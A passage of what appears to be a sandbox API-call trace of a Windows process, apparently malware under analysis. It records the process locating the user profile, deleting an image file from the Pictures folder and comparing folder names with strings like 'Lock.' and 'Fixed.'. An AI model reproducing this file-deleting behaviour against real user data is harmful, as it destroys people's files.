wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.097] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.097] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0209.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0209.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0209.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0209.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0209.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4a) returned 0x29eb160 [0209.099] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/aJ_Kkru.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\aJ_Kkru.png", lpFilePart=0x8cedf4*="aJ_Kkru.png") returned 0x24 [0209.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb160 | out: hHeap=0x2af0000) returned 1 [0209.099] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJ_Kkru.png" (normalized: "c:\\users\\fd1hvy\\pictures\\aj_kkru.png")) returned 0x20 [0209.099] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJ_Kkru.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51185a30, ftCreationTime.dwHighDateTime=0x1d5cf88, ftLastAccessTime.dwLowDateTime=0x5ad20230, ftLastAccessTime.dwHighDateTime=0x1d5cc20, ftLastWriteTime.dwLowDateTime=0x5ad20230, ftLastWriteTime.dwHighDateTime=0x1d5cc20, nFileSizeHigh=0x0, nFileSizeLow=0xef91, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="aJ_Kkru.png", cAlternateFileName="")) returned 0x9e1db8 [0209.099] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJ_Kkru.png" (normalized: "c:\\users\\fd1hvy\\pictures\\aj_kkru.png")) returned 1 [0209.102] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51185a30, ftCreationTime.dwHighDateTime=0x1d5cf88, ftLastAccessTime.dwLowDateTime=0x5ad20230, ftLastAccessTime.dwHighDateTime=0x1d5cc20, ftLastWriteTime.dwLowDateTime=0x5ad20230, ftLastWriteTime.dwHighDateTime=0x1d5cc20, nFileSizeHigh=0x0, nFileSizeLow=0xef91, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="aJ_Kkru.png", cAlternateFileName="")) returned 0 [0209.102] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0209.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0209.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.103] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0209.103] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0209.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0209.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0209.104] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0209.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0209.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0209.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0209.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0209.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4a) returned 0x29eb420 [0209.106] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/aJ_Kkru.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\aJ_Kkru.png", lpFilePart=0x8cf650*="aJ_Kkru.png") returned 0x24 [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb420 | out: hHeap=0x2af0000) returned 1 [0209.106] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\aJ_Kkru.png" (normalized: "c:\\users\\fd1hvy\\pictures\\aj_kkru.png")) returned 0xffffffff [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3f58 | out: hHeap=0x2af0000) returned 1 [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.106] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0209.106] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.106] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0209.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0209.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0209.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0209.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0209.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0209.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0209.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Camera Roll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="amera Roll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mera Roll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="era Roll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ra Roll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a Roll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Roll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0209.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0209.107] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0209.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0209.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0209.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0209.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0209.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0209.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0209.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0209.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0209.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0209.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0209.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Camera Roll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="amera Roll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mera Roll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="era Roll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ra Roll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a Roll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0209.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0209.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0209.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0209.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.109] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.109] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0209.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0209.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0209.109] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0209.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.110] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | 